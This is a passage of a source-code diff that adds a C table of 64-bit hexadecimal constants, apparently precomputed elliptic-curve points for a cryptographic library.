}, ++ { UINT64_C(0x51FFA1D58CF7E3F7), UINT64_C(0xF01B7886BDC9FB43), ++ UINT64_C(0xD65AB610261A0D35), UINT64_C(0x84BCBAFD7574A554), ++ UINT64_C(0x4B119956FAD70208), UINT64_C(0xDDC329C24FAB5243) } }, ++ { { UINT64_C(0x1A08AA579CE92177), UINT64_C(0x3395E557DC2B5C36), ++ UINT64_C(0xFDFE7041394ED04E), UINT64_C(0xB797EB24C6DFCDDE), ++ UINT64_C(0x284A6B2ACB9DE5D6), UINT64_C(0xE0BD95C807222765) }, ++ { UINT64_C(0x114A951B9FE678A7), UINT64_C(0xE7ECD0BD9E4954EC), ++ UINT64_C(0x7D4096FE79F0B8A9), UINT64_C(0xBDB26E9A09724FE2), ++ UINT64_C(0x08741AD8F787AF95), UINT64_C(0x2BF9727224045AD8) } }, ++ { { UINT64_C(0xAB1FEDD9A9451D57), UINT64_C(0xDF4D91DF483E38C9), ++ UINT64_C(0x2D54D31124E9CF8E), UINT64_C(0x9C2A5AF87A22EEB6), ++ UINT64_C(0xBD9861EF0A43F123), UINT64_C(0x581EA6A238A18B7B) }, ++ { UINT64_C(0xAF339C85296470A3), UINT64_C(0xF9603FCDAFD8203E), ++ UINT64_C(0x95D0535096763C28), UINT64_C(0x15445C16860EC831), ++ UINT64_C(0x2AFB87286867A323), UINT64_C(0x4B152D6D0C4838BF) } }, ++ { { UINT64_C(0x45BA0E4F837CACBA), UINT64_C(0x7ADB38AEC0725275), ++ UINT64_C(0x19C82831942D3C28), UINT64_C(0x94F4731D6D0FE7DD), ++ UINT64_C(0xC3C07E134898F1E6), UINT64_C(0x76350EACED410B51) }, ++ { UINT64_C(0x0FA8BECAF99AACFC), UINT64_C(0x2834D86F65FAF9CF), ++ UINT64_C(0x8E62846A6F3866AF), UINT64_C(0xDAA9BD4F3DFD6A2B), ++ UINT64_C(0xC27115BBA6132655), UINT64_C(0x83972DF7BD5A32C2) } }, ++ { { UINT64_C(0xA330CB5BD513B825), UINT64_C(0xAE18B2D3EE37BEC3), ++ UINT64_C(0xFC3AB80AF780A902), UINT64_C(0xD7835BE2D607DDF1), ++ UINT64_C(0x8120F7675B6E4C2B), UINT64_C(0xAA8C385967E78CCB) }, ++ { UINT64_C(0xA8DA8CE2AA0ED321), UINT64_C(0xCB8846FDD766341A), ++ UINT64_C(0xF2A342EE33DC9D9A), UINT64_C(0xA519E0BED0A18A80), ++ UINT64_C(0x9CDAA39CAF48DF4C), UINT64_C(0xA4B500CA7E0C19EE) } }, ++ { { UINT64_C(0x83A7FD2F8217001B), UINT64_C(0x4F6FCF064296A8BA), ++ UINT64_C(0x7D74864391619927), UINT64_C(0x174C1075941E4D41), ++ UINT64_C(0x037EDEBDA64F5A6C), UINT64_C(0xCF64DB3A6E29DC56) }, ++ { UINT64_C(0x150B3ACE37C0B9F4), UINT64_C(0x1323234A7168178B), ++ UINT64_C(0x1CE47014EF4D1879), UINT64_C(0xA22E374217FB4D5C), ++ UINT64_C(0x69B81822D985F794), UINT64_C(0x199C21C4081D7214) } }, ++ { { UINT64_C(0x160BC7A18F04B4D2), UINT64_C(0x79CA81DDB10DE174), ++ UINT64_C(0xE2A280B02DA1E9C7), UINT64_C(0xB4F6BD991D6A0A29), ++ UINT64_C(0x57CF3EDD1C5B8F27), UINT64_C(0x7E34FC57158C2FD4) }, ++ { UINT64_C(0x828CFD89CAC93459), UINT64_C(0x9E631B6FB7AF499F), ++ UINT64_C(0xF4DC8BC0DA26C135), UINT64_C(0x6128ED3937186735), ++ UINT64_C(0xBB45538B67BF0BA5), UINT64_C(0x1ADDD4C10064A3AB) } }, ++ }, ++ { ++ { { UINT64_C(0xC32730E8DD14D47E), UINT64_C(0xCDC1FD42C0F01E0F), ++ UINT64_C(0x2BACFDBF3F5CD846), UINT64_C(0x45F364167272D4DD), ++ UINT64_C(0xDD813A795EB75776), UINT64_C(0xB57885E450997BE2) }, ++ { UINT64_C(0xDA054E2BDB8C9829), UINT64_C(0x4161D820AAB5A594), ++ UINT64_C(0x4C428F31026116A3), UINT64_C(0x372AF9A0DCD85E91), ++ UINT64_C(0xFDA6E903673ADC2D), UINT64_C(0x4526B8ACA8DB59E6) } }, ++ { { UINT64_C(0x68FE359DE23A8472), UINT64_C(0x43EB12BD4CE3C101), ++ UINT64_C(0x0EC652C3FC704935), UINT64_C(0x1EEFF1F952E4E22D), ++ UINT64_C(0xBA6777CB083E3ADA), UINT64_C(0xAB52D7DC8BEFC871) }, ++ { UINT64_C(0x4EDE689F497CBD59), UINT64_C(0xC8AE42B927577DD9), ++ UINT64_C(0xE0F080517AB83C27), UINT64_C(0x1F3D5F252C8C1F48), ++ UINT64_C(0x57991607AF241AAC), UINT64_C(0xC4458B0AB8A337E0) } }, ++ { { UINT64_C(0x3DBB3FA651DD1BA9), UINT64_C(0xE53C1C4D545E960B), ++ UINT64_C(0x35AC6574793CE803), UINT64_C(0xB2697DC783DBCE4F), ++ UINT64_C(0xE35C5BF2E13CF6B0), UINT64_C(0x35034280B0C4A164) }, ++ { UINT64_C(0xAA490908D9C0D3C1), UINT64_C(0x2CCE614DCB4D2E90), ++ UINT64_C(0xF646E96C54D504E4), UINT64_C(0xD74E7541B73310A3), ++ UINT64_C(0xEAD7159618BDE5DA), UINT64_C(0x96E7F4A8AA09AEF7) } }, ++ { { UINT64_C(0xA8393A245D6E5F48), UINT64_C(0x2C8D7EA2F9175CE8), ++ UINT64_C(0xD8824E0255A20268), UINT64_C(0x9DD9A272A446BCC6), ++ UINT64_C(0xC929CDED5351499B), UINT64_C(0xEA5AD9ECCFE76535) }, ++ { UINT64_C(0x26F3D7D9DC32D001), UINT64_C(0x51C3BE8343EB9689), ++ UINT64_C(0x91FDCC06759E6DDB), UINT64_C(0xAC2E1904E302B891), ++ UINT64_C(0xAD25C645C207E1F7), UINT64_C(0x28A70F0DAB3DEB4A) } }, ++ { { UINT64_C(0x922D7F9703BEA8F1), UINT64_C(0x3AD820D4584570BE), ++ UINT64_C(0x0CE0A8503CD46B43), UINT64_C(0x4C07911FAE66743D), ++ UINT64_C(0x66519EB9FDA60023), UINT64_C(0x7F83004BEC2ACD9C) }, ++ { UINT64_C(0x001E0B80C3117EAD), UINT64_C(0xBB72D5410722BA25), ++ UINT64_C(0x3AF7DB966E9A5078), UINT64_C(0x86C5774E701B6B4C), ++ UINT64_C(0xBD2C0E8E37824DB5), UINT64_C(0x3AE3028CBFAC286D) } }, ++ { { UINT64_C(0x83D4D4A8A33E071B), UINT64_C(0x881C0A9261444BB5), ++ UINT64_C(0xEEA1E292520E3BC3), UINT64_C(0x5A5F4C3C2AAAB729), ++ UINT64_C(0x0B766C5EE63C7C94), UINT64_C(0x62BB8A9FBB2CC79C) }, ++ { UINT64_C(0x97ADC7D2AA5DC49D), UINT64_C(0x30CC26B331718681), ++ UINT64_C(0xAC86E6FF56E86EDE), UINT64_C(0x37BCA7A2CD52F7F2), ++ UINT64_C(0x734D2C949CE6D87F), UINT64_C(0x06A71D71C2F7E0CA) } }, ++ { { UINT64_C(0x559DCF75C6357D33), UINT64_C(0x4616D940652517DE), ++ UINT64_C(0x3D576B981CCF207B), UINT64_C(0x51E2D1EF1979F631), ++ UINT64_C(0x57517DDD06AE8296), UINT64_C(0x309A3D7FD6E7151F) }, ++ { UINT64_C(0xBA2A23E60E3A6FE5), UINT64_C(0x76CF674AD28B22C3), ++ UINT64_C(0xD235AD07F8B808C3), UINT64_C(0x7BBF4C586B71213A), ++ UINT64_C(0x0676792E93271EBB), UINT64_C(0x2CFD2C7605B1FC31) } }, ++ { { UINT64_C(0x4258E5C037A450F5), UINT64_C(0xC3245F1B52D2B118), ++ UINT64_C(0x6DF7B48482BC5963), UINT64_C(0xE520DA4D9C273D1E), ++ UINT64_C(0xED78E0122C3010E5), UINT64_C(0x112229483C1D4C05) }, ++ { UINT64_C(0xE3DAE5AFC692B490), UINT64_C(0x3272BD10C197F793), ++ UINT64_C(0xF7EAE411E709ACAA), UINT64_C(0x00B0C95F778270A6), ++ UINT64_C(0x4DA76EE1220D4350), UINT64_C(0x521E1461AB71E308) } }, ++ { { UINT64_C(0x7B654323343196A3), UINT64_C(0x35D442ADB0C95250), ++ UINT64_C(0x38AF50E6E264FF17), UINT64_C(0x28397A412030D2EA), ++ UINT64_C(0x8F1D84E9F74EEDA1), UINT64_C(0xD521F92DE6FB3C52) }, ++ { UINT64_C(0xAF358D7795733811), UINT64_C(0xEBFDDD0193ABFE94), ++ UINT64_C(0x05D8A028D18D99DE), UINT64_C(0x5A664019B5D5BDD9), ++ UINT64_C(0x3DF172822AA12FE8), UINT64_C(0xB42E006FB889A28E) } }, ++ { { UINT64_C(0xCF10E97DBC35CB1A), UINT64_C(0xC70A7BBD994DEDC5), ++ UINT64_C(0x76A5327C37D04FB9), UINT64_C(0x87539F76A76E0CDA), ++ UINT64_C(0xE9FE493FCD60A6B1), UINT64_C(0xA4574796132F01C0) }, ++ { UINT64_C(0xC43B85EBDB70B167), UINT64_C(0x81D5039A98551DFA), ++ UINT64_C(0x6B56FBE91D979FA4), UINT64_C(0x49714FD78615098F), ++ UINT64_C(0xB10E1CEA94DECAB5), UINT64_C(0x8342EBA3480EF6E3) } }, ++ { { UINT64_C(0xE1E030B0B3677288), UINT64_C(0x2978174C8D5CE3AF), ++ UINT64_C(0xAFC0271CF7B2DE98), UINT64_C(0x745BC6F3B99C20B5), ++ UINT64_C(0x9F6EDCED1E3BB4E5), UINT64_C(0x58D3EE4E73C8C1FC) }, ++ { UINT64_C(0x1F3535F47FD30124), UINT64_C(0xF366AC705FA62502), ++ UINT64_C(0x4C4C1FDD965363FE), UINT64_C(0x8B2C77771DE2CA2B), ++ UINT64_C(0x0CB54743882F1173), UINT64_C(0x94B6B8C071343331) } }, ++ { { UINT64_C(0x75AF014165B8B35B), UINT64_C(0x6D7B84854670A1F5), ++ UINT64_C(0x6EAA3A47A3B6D376), UINT64_C(0xD7E673D2CB3E5B66), ++ UINT64_C(0xC0338E6C9589AB38), UINT64_C(0x4BE26CB309440FAA) }, ++ { UINT64_C(0x82CB05E7394F9AA3), UINT64_C(0xC45C8A8A7F7792EA), ++ UINT64_C(0x37E5E33BB687DC70), UINT64_C(0x63853219DFE48E49), ++ UINT64_C(0x087951C16D0E5C8C), UINT64_C(0x7696A8C72BC27310) } }, ++ { { UINT64_C(0xA05736D5B67E834A), UINT64_C(0xDD2AA0F29098D42A), ++ UINT64_C(0x09F0C1D849C69DDC), UINT64_C(0x81F8BC1C8FF0F0F3), ++ UINT64_C(0x36FD3A4F03037775), UINT64_C(0x8286717D4B06DF5C) }, ++ { UINT64_C(0xB878F496A9079EA2), UINT64_C(0xA5642426D7DC796D), ++ UINT64_C(0x29B9351A67FDAC2B), UINT64_C(0x93774C0E1D543CDE), ++ UINT64_C(0x4F8793BA1A8E31C4), UINT64_C(0x7C9F3F3A6C94798A) } }, ++ { { UINT64_C(0x23C5AD11CB8ECDB8), UINT64_C(0x1E88D25E485A6A02), ++ UINT64_C(0xB27CBE84F1E268AE), UINT64_C(0xDDA80238F4CD0475), ++ UINT64_C(0x4F88857B49F8EB1B), UINT64_C(0x91B1221F52FB07F9) }, ++ { UINT64_C(0x7CE974608637FA67), UINT64_C(0x528B3CF4632198D8), ++ UINT64_C(0x33365AB3F6623769), UINT64_C(0x6FEBCFFF3A83A30F), ++ UINT64_C(0x398F4C999BD341EB), UINT64_C(0x180712BBB33A333C) } }, ++ { { UINT64_C(0x2B8655A2D93429E7), UINT64_C(0x99D600BB75C8B9EE), ++ UINT64_C(0x9FC1AF8B88FCA6CD), UINT64_C(0x2FB533867C311F80), ++ UINT64_C(0x20743ECBE8A71EEE), UINT64_C(0xEC3713C4E848B49E) }, ++ { UINT64_C(0x5B2037B5BB886817), UINT64_C(0x40EF5AC2307DBAF4), ++ UINT64_C(0xC2888AF21B3F643D), UINT64_C(0x0D8252E19D5A4190), ++ UINT64_C(0x06CC0BEC2DB52A8A), UINT64_C(0xB84B98EAAB94E969) } }, ++ { { UINT64_C(0x2E7AC078A0321E0E), UINT64_C(0x5C5A1168EF3DAAB6), ++ UINT64_C(0xD2D573CBADDD454A), UINT64_C(0x27E149E236259CC7), ++ UINT64_C(0x1EDFD469A63F47F1), UINT64_C(0x039AD674F1BD2CFD) }, ++ { UINT64_C(0xBFA633FC3077D3CC), UINT64_C(0x14A7C82F2FD64E9F), ++ UINT64_C(0xAAA650149D824999), UINT64_C(0x41AB113B21760F2E), ++ UINT64_C(0x23E646C51CAE260A), UINT64_C(0x08062C8F68DC5159) } }, ++ }, ++ { ++ { { UINT64_C(0x2E7D0A16204BE028), UINT64_C(0x4F1D082ED0E41851), ++ UINT64_C(0x15F1DDC63EB317F9), UINT64_C(0xF02750715ADF71D7), ++ UINT64_C(0x2CE33C2EEE858BC3), UINT64_C(0xA24C76D1DA73B71A) }, ++ { UINT64_C(0x9EF6A70A6C70C483), UINT64_C(0xEFCF170505CF9612), ++ UINT64_C(0x9F5BF5A67502DE64), UINT64_C(0xD11122A1A4701973), ++ UINT64_C(0x82CFAAC2A2EA7B24), UINT64_C(0x6CAD67CC0A4582E1) } }, ++ { { UINT64_C(0x597A26FFB4DC8600), UINT64_C(0x264A09F3F9288555), ++ UINT64_C(0x0B06AFF65C27F5F6), UINT64_C(0xCE5AB665D8D544E6), ++ UINT64_C(0x92F031BE99275C32), UINT64_C(0xAF51C5BBF42E0E7C) }, ++ { UINT64_C(0x5BB28B061E37B36D), UINT64_C(0x583FBA6A8473543A), ++ UINT64_C(0xE73FD299F93FB7DC), UINT64_C(0xFCD999A86E2CCAD9), ++ UINT64_C(0xB8C8A6DF334D4F57), UINT64_C(0x5ADB28DD9A2ACC9B) } }, ++ { { UINT64_C(0x5ADF3D9A111792B9), UINT64_C(0x1C77A3054F1E0D09), ++ UINT64_C(0xF9FBCE33A82D3736), UINT64_C(0xF307823E718C8AA3), ++ UINT64_C(0x860578CF416CCF69), UINT64_C(0xB942ADD81EF8465B) }, ++ { UINT64_C(0x9EE0CF97CD9472E1), UINT64_C(0xE6792EEFB01528A8), ++ UINT64_C(0xF99B9A8DC09DA90B), UINT64_C(0x1F521C2DCBF3CCB8), ++ UINT64_C(0x6BF6694891A62632), UINT64_C(0xCC7A9CEB854FE9DA) } }, ++ { { UINT64_C(0x46303171491CCB92), UINT64_C(0xA80A8C0D2771235B), ++ UINT64_C(0xD8E497FFF172C7CF), UINT64_C(0x7F7009D735B193CF), ++ UINT64_C(0x6B9FD3F7F19DF4BC), UINT64_C(0xADA548C3B46F1E37) }, ++ { UINT64_C(0x87C6EAA9C7A20270), UINT64_C(0xEF2245D6AE78EF99), ++ UINT64_C(0x2A121042539EAB95), UINT64_C(0x29A6D5D779B8F5CC), ++ UINT64_C(0x33803A10B77840DC), UINT64_C(0xFEDD3A7011A6A30F) } }, ++ { { UINT64_C(0xFA070E22142403D1), UINT64_C(0x68FF316015C6F7F5), ++ UINT64_C(0xE09F04E6223A0CE8), UINT64_C(0x22BBD01853E14183), ++ UINT64_C(0x35D9FAFCCF45B75B), UINT64_C(0x3A34819D7ECEEC88) }, ++ { UINT64_C(0xD9CF7568D33262D2), UINT64_C(0x431036D5841D1505), ++ UINT64_C(0x0C8005659EB2A79A), UINT64_C(0x8E77D9F05F7EDC6A), ++ UINT64_C(0x19E12D0565E800AA), UINT64_C(0x335C8D36B7784E7C) } }, ++ { { UINT64_C(0x8B2FC4E96484FD40), UINT64_C(0xEE702764A35D24EA), ++ UINT64_C(0x15B28AC7B871C3F3), UINT64_C(0x805B4048E097047F), ++ UINT64_C(0xD6F1B8DF647CAD2F), UINT64_C(0xF1D5B458DC7DD67F) }, ++ { UINT64_C(0x324C529C25148803), UINT64_C(0xF6185EBE21274FAF), ++ UINT64_C(0xAF14751E95148B55), UINT64_C(0x283ED89D28F284F4), ++ UINT64_C(0x93AD20E74CBEBF1A), UINT64_C(0x5F6EC65D882935E1) } }, ++ { { UINT64_C(0xE222EBA4A4DCEFE9), UINT64_C(0x63AD235FEC1CEB74), ++ UINT64_C(0x2E0BF749E05B18E7), UINT64_C(0x547BD050B48BDD87), ++ UINT64_C(0x0490C970F5AA2FC4), UINT64_C(0xCED5E4CF2B431390) }, ++ { UINT64_C(0x07D8270451D2898E), UINT64_C(0x44B72442083B57D4), ++ UINT64_C(0xA4ADA2305037FCE8), UINT64_C(0x55F7905E50510DA6), ++ UINT64_C(0xD8EE724F8D890A98), UINT64_C(0x925A8E7C11B85640) } }, ++ { { UINT64_C(0x5BFA10CD1CA459ED), UINT64_C(0x593F085A6DCF56BF), ++ UINT64_C(0xE6F0AD9BC0579C3E), UINT64_C(0xC11C95A22527C1AD), ++ UINT64_C(0x7CFA71E1CF1CB8B3), UINT64_C(0xEDCFF8331D6DC79D) }, ++ { UINT64_C(0x581C4BBE432521C9), UINT64_C(0xBF620096144E11A0), ++ UINT64_C(0x54C38B71BE3A107B), UINT64_C(0xED555E37E2606EC0), ++ UINT64_C(0x3FB148B8D721D034), UINT64_C(0x79D53DAD0091BC90) } }, ++ { { UINT64_C(0xE32068C5B7082C80), UINT64_C(0x4140FFD27A144E22), ++ UINT64_C(0x5811D2F09EDD9E86), UINT64_C(0xCDD79B5FC572C465), ++ UINT64_C(0x3563FED1C97BF450), UINT64_C(0x985C1444F2CE5C9C) }, ++ { UINT64_C(0x260AE79799950F1C), UINT64_C(0x659F4F40765E9DED), ++ UINT64_C(0x2A412D662E3BC286), UINT64_C(0xE865E62CF87E0C82), ++ UINT64_C(0xD63D3A9A6C05E7D7), UINT64_C(0x96725D678686F89A) } }, ++ { { UINT64_C(0xC99A5E4CAB7EA0F5), UINT64_C(0xC9860A1AC5393FA9), ++ UINT64_C(0x9ED83CEE8FDEEFC0), UINT64_C(0xE3EA8B4C5ED6869A), ++ UINT64_C(0x89A85463D2EED3A9), UINT64_C(0x2CD91B6DE421A622) }, ++ { UINT64_C(0x6FEC1EF32C91C41D), UINT64_C(0xB1540D1F8171037D), ++ UINT64_C(0x4FE4991A1C010E5B), UINT64_C(0x28A3469FFC1C7368), ++ UINT64_C(0xE1EEECD1AF118781), UINT64_C(0x1BCCB97799EF3531) } }, ++ { { UINT64_C(0x63D3B638C4DAB7B8), UINT64_C(0xD92133B63F7F5BAB), ++ UINT64_C(0x2573EE2009FB6069), UINT64_C(0x771FABDF890A1686), ++ UINT64_C(0x1D0BA21FA77AFFF5), UINT64_C(0x83145FCCBA3DD2C0) }, ++ { UINT64_C(0xFA073A812D115C20), UINT64_C(0x6AB7A9D319176F27), ++ UINT64_C(0xAF62CF939AC639EE), UINT64_C(0xF73848B92CCD1319), ++ UINT64_C(0x3B6132343C71659D), UINT64_C(0xF8E0011C10AB3826) } }, ++ { { UINT64_C(0x0501F0360282FFA5), UINT64_C(0xC39A5CF4D9E0F15A), ++ UINT64_C(0x48D8C7299A3D1F3C), UINT64_C(0xB5FC136B64E18EDA), ++ UINT64_C(0xE81B53D97E58FEF0), UINT64_C(0x0D534055F7B0F28D) }, ++ { UINT64_C(0x47B8DE127A80619B), UINT64_C(0x60E2A2B381F9E55D), ++ UINT64_C(0x6E9624D7CF564CC5), UINT64_C(0xFDF18A216BDEDFFF), ++ UINT64_C(0x3787DE38C0D5FC82), UINT64_C(0xCBCAA347497A6B11) } }, ++ { { UINT64_C(0x6E7EF35EB226465A), UINT64_C(0x4B4699195F8A2BAF), ++ UINT64_C(0x44B3A3CF1120D93F), UINT64_C(0xB052C8B668F34AD1), ++ UINT64_C(0x27EC574BEF7632DD), UINT64_C(0xAEBEA108685DE26F) }, ++ { UINT64_C(0xDA33236BE39424B6), UINT64_C(0xB1BD94A9EBCC22AD), ++ UINT64_C(0x6DDEE6CC2CDFB5D5), UINT64_C(0xBDAED9276F14069A), ++ UINT64_C(0x2ADE427C2A247CB7), UINT64_C(0xCE96B436ED156A40) } }, ++ { { UINT64_C(0xDDDCA36081F3F819), UINT64_C(0x4AF4A49FD419B96A), ++ UINT64_C(0x746C65257CB966B9), UINT64_C(0x01E390886F610023), ++ UINT64_C(0x05ECB38D98DD33FC), UINT64_C(0x962B971B8F84EDF4) }, ++ { UINT64_C(0xEB32C0A56A6F2602), UINT64_C(0xF026AF71562D60F2), ++ UINT64_C(0xA9E246BF84615FAB), UINT64_C(0xAD96709275DBAE01), ++ UINT64_C(0xBF97C79B3ECE5D07), UINT64_C(0xE06266C774EAA3D3) } }, ++ { { UINT64_C(0x161A01572E6DBB6E), UINT64_C(0xB8AF490460FA8F47), ++ UINT64_C(0xE4336C4400197F22), UINT64_C(0xF811AFFA9CEDCE0E), ++ UINT64_C(0xB1DD7685F94C2EF1), UINT64_C(0xEEDC0F4BCA957BB0) }, ++ { UINT64_C(0xD319FD574AA76BB1), UINT64_C(0xB3525D7C16CD7CCB), ++ UINT64_C(0x7B22DA9CA97DD072), UINT64_C(0x99DB84BD38A83E71), ++ UINT64_C(0x4939BC8DC0EDD8BE), UINT64_C(0x06D524EA903A932C) } }, ++ { { UINT64_C(0x4BC950EC0E31F639), UINT64_C(0xB7ABD3DC6016BE30), ++ UINT64_C(0x3B0F44736703DAD0), UINT64_C(0xCC405F8B0AC1C4EA), ++ UINT64_C(0x9BED5E57176C3FEE), UINT64_C(0xF452481036AE36C2) }, ++ { UINT64_C(0xC1EDBB8315D7B503), UINT64_C(0x943B1156E30F3657), ++ UINT64_C(0x984E9EEF98377805), UINT64_C(0x291AE7AC36CF1DEB), ++ UINT64_C(0xFED8748CA9F66DF3), UINT64_C(0xECA758BBFEA8FA5D) } }, ++ }, ++ { ++ { { UINT64_C(0xACC787EF2DD1B249), UINT64_C(0x736E1030D82976F1), ++ UINT64_C(0x0A6940FAA01B3649), UINT64_C(0xE00B926BC42341E7), ++ UINT64_C(0x911508D0DE8FFD6C), UINT64_C(0x4DCF8D465276B0CB) }, ++ { UINT64_C(0x23AD0A90CC3CAD8D), UINT64_C(0x2A92E54CADED962A), ++ UINT64_C(0x93FBEC4DF231BFAF), UINT64_C(0x9544BC774798987A), ++ UINT64_C(0x48084E2508E29F60), UINT64_C(0x0C0D2F4332DE5869) } }, ++ { { UINT64_C(0x6778F9703A9ABC13), UINT64_C(0xFD014FAC3D2B166B), ++ UINT64_C(0x1FE4FC783C6FED60), UINT64_C(0x04295FA8AA7C69C5), ++ UINT64_C(0xA01DE56D7C123175), UINT64_C(0x0FA0D3A83D9A713A) }, ++ { UINT64_C(0xA7A6E5E3E3E08ADD), UINT64_C(0xBD77E94B1AC58F85), ++ UINT64_C(0x078F6FD2B7321A9C), UINT64_C(0x9564601E911EF6D9), ++ UINT64_C(0x31C5C1B2415C6BEF), UINT64_C(0xE6C0C91ED3212C62) } }, ++ { { UINT64_C(0xBA7BD23C0D16022F), UINT64_C(0xE9CF4750198BE288), ++ UINT64_C(0x304E316947DEEC65), UINT64_C(0xCF65B41F96EEB288), ++ UINT64_C(0x17E99C17927E9E3B), UINT64_C(0x82225546F6630A80) }, ++ { UINT64_C(0x15122B8ACA067BD9), UINT64_C(0xE2673205B77B4E98), ++ UINT64_C(0x130375659407CA63), UINT64_C(0x53624F548B621602), ++ UINT64_C(0x96AF2CB1EAE4BD06), UINT64_C(0x576ECD1C8FA20829) } }, ++ { { UINT64_C(0xA551CE107E02D2D0), UINT64_C(0x1584ED249D13DBC7), ++ UINT64_C(0x082017AD4DA7B6D8), UINT64_C(0x81918A8FE054BC48), ++ UINT64_C(0x677DB48E572DC384), UINT64_C(0x2EF822966155484C) }, ++ { UINT64_C(0xC3DB14C641B9C231), UINT64_C(0x910A87D14A766192), ++ UINT64_C(0x93D5CC8610AB8E0F), UINT64_C(0x4194D548AE57CA1B), ++ UINT64_C(0xFAF3A1D6267FC37A), UINT64_C(0x70EC236413B87C97) } }, ++ { { UINT64_C(0x064B565B5E12756A), UINT64_C(0x953B7BD1AE49C98E), ++ UINT64_C(0xE0CE8284F7001D91), UINT64_C(0x1546060BF31108D0), ++ UINT64_C(0xDBC2C3F46779B6E2), UINT64_C(0x157AA47DE0DD07CF) }, ++ { UINT64_C(0xBF4A1C6FF23B261E), UINT64_C(0x5B8EED30654F4BE5), ++ UINT64_C(0xDF5896D36B20CCD8), UINT64_C(0x56920E2C559ED23D), ++ UINT64_C(0x901F342EFA6E3E27), UINT64_C(0x745C747C896CA082) } }, ++ { { UINT64_C(0xDBCCD5752944EC84), UINT64_C(0x54A2A935A5FF65FE), ++ UINT64_C(0x88C92A5E1A1319B6), UINT64_C(0x9537C28F82DA96C1), ++ UINT64_C(0xB683647435F93C46), UINT64_C(0xEC526A1D65B0846C) }, ++ { UINT64_C(0x6F12AFBDF382C412), UINT64_C(0x5EBC81D89E99FA06), ++ UINT64_C(0x97B5D672869B93BD), UINT64_C(0x2983C310377E12AA), ++ UINT64_C(0x4875968124D681EA), UINT64_C(0x1E0BD106287FD767) } }, ++ { { UINT64_C(0x0AC75A3E7231247F), UINT64_C(0x65C20DE6EF27AD3A), ++ UINT64_C(0x87EB6CF1BD02EEE5), UINT64_C(0x264ACA7A00147E03), ++ UINT64_C(0xEBC78581AE2A9437), UINT64_C(0x9929964E6316BFA5) }, ++ { UINT64_C(0xDC09E0409AF207EF), UINT64_C(0x3ECFFE2D0C9D8658), ++ UINT64_C(0x547EA735DFB43D38), UINT64_C(0x5485247BD04B1B20), ++ UINT64_C(0xB18D3F02BFD8B609), UINT64_C(0xEEB3E805CCE73705) } }, ++ { { UINT64_C(0xDAB1A525DB93850F), UINT64_C(0x18ADAA238365B7D5), ++ UINT64_C(0x58485C90113FC8C7), UINT64_C(0x80C3DBB9348AD323), ++ UINT64_C(0xAF892FB5E16ADCA1), UINT64_C(0x2183C879979F005A) }, ++ { UINT64_C(0x20FA1A940643A99E), UINT64_C(0x2741221C1A1609CB), ++ UINT64_C(0x1C1687E53C2FBDDC), UINT64_C(0xDCCF329ED420D6CF), ++ UINT64_C(0x75D5577D2B7197D1), UINT64_C(0x4C3C3875C8729D9C) } }, ++ { { UINT64_C(0x5E79F995E5CBDCB9), UINT64_C(0x03139824A742FCC7), ++ UINT64_C(0x6D0C214A239EF4A1), UINT64_C(0x53A27952401A2944), ++ UINT64_C(0xF42A1B34C10BCDF0), UINT64_C(0x426BAA437CF38061) }, ++ { UINT64_C(0x16A53139A96AD0C8), UINT64_C(0x627F1D316BAD5301), ++ UINT64_C(0x5AF748774ACCD627), UINT64_C(0x3C58A1C5B55B0FB8), ++ UINT64_C(0xFAA57B91F4399A6A), UINT64_C(0xBAD283FBC28094B8) } }, ++ { { UINT64_C(0xBA32AC6183E10A93), UINT64_C(0x1C91F6B4EC06BDB0), ++ UINT64_C(0x42E6CFBC65F60C93), UINT64_C(0xEFE33BC82C0CDCBE), ++ UINT64_C(0xE0FE1D094D6414F2), UINT64_C(0x4C11231676FA5C5B) }, ++ { UINT64_C(0x812C1DC62E26200A), UINT64_C(0xD6C413C5EE879D25), ++ UINT64_C(0xBEADE255BCA8BAFE), UINT64_C(0x0EAF4AE2CE2BA0E7), ++ UINT64_C(0x66E9FFB0C4F4408A), UINT64_C(0xB36A86D79782C7AD) } }, ++ { { UINT64_C(0x10FCD1F4BAD8D1C7), UINT64_C(0xC903816A4502F645), ++ UINT64_C(0x7FAC1CC1A503B895), UINT64_C(0x8BCD60410778900C), ++ UINT64_C(0x5A5F22025BCF2784), UINT64_C(0x9B157E8710EDB896) }, ++ { UINT64_C(0x4C58DA69F602A8B1), UINT64_C(0xD55132F859EC9D7E), ++ UINT64_C(0x155B719AA26D4870), UINT64_C(0x25AAFCA336441746), ++ UINT64_C(0x01F83338DD3B6B30), UINT64_C(0xD52BB5C1551917CC) } }, ++ { { UINT64_C(0xA0B6207B6135066A), UINT64_C(0xB3409F842AEC8CBD), ++ UINT64_C(0x5EBFD43619D87DF0), UINT64_C(0xCB4C209BE8526DE2), ++ UINT64_C(0xD764085B21E1A230), UINT64_C(0x96F915540899964A) }, ++ { UINT64_C(0xB0BEC8EFA57D122A), UINT64_C(0xC572EC565D9D0B33), ++ UINT64_C(0xEBE2A780CFA7C72C), UINT64_C(0x52D40CDB9EF3295C), ++ UINT64_C(0x640045840DE74DFE), UINT64_C(0xA6846432C0809716) } }, ++ { { UINT64_C(0x0D09E8CD02C979BC), UINT64_C(0xEC4B21F6409F4F2A), ++ UINT64_C(0x68125C7013FB07CA), UINT64_C(0x1C4CFC176FDFA72A), ++ UINT64_C(0xC9E71B9E04539FCD), UINT64_C(0x94B7103D8BA70797) }, ++ { UINT64_C(0x6B81E82FB33FDE83), UINT64_C(0x7CA9A8CAEABAFD4B), ++ UINT64_C(0xADD85A67EAB819CE), UINT64_C(0xAEC2548398E99FFC), ++ UINT64_C(0x938D6440274A07B6), UINT64_C(0x0A5C7097564A6AA0) } }, ++ { { UINT64_C(0x7284FF502F4FCEB6), UINT64_C(0x0A28715A78D0D5CB), ++ UINT64_C(0xE70B7014BFCE187C), UINT64_C(0xA6B538F57A17148D), ++ UINT64_C(0x1DAB07C9DD427166), UINT64_C(0x5C5578B0149D23CA) }, ++ { UINT64_C(0x875E2056875B5EDE), UINT64_C(0xCBF44B6D02C893B9), ++ UINT64_C(0x5715A77E5C2993FB), UINT64_C(0xAF3281463410597E), ++ UINT64_C(0x65DF418F42DC49DF), UINT64_C(0x7AC9C720A9EE52F6) } }, ++ { { UINT64_C(0xB1C9AA0762955486), UINT64_C(0xCBF35BE3245061D7), ++ UINT64_C(0x811E1BD38CF4DDC0), UINT64_C(0xD9D4589C948F7C84), ++ UINT64_C(0x30D09A0FCB0F996D), UINT64_C(0x1A1B3B7A590E7704) }, ++ { UINT64_C(0xA848E3492082768D), UINT64_C(0x9FEBD4929A249DF4), ++ UINT64_C(0x503420AF5F20439A), 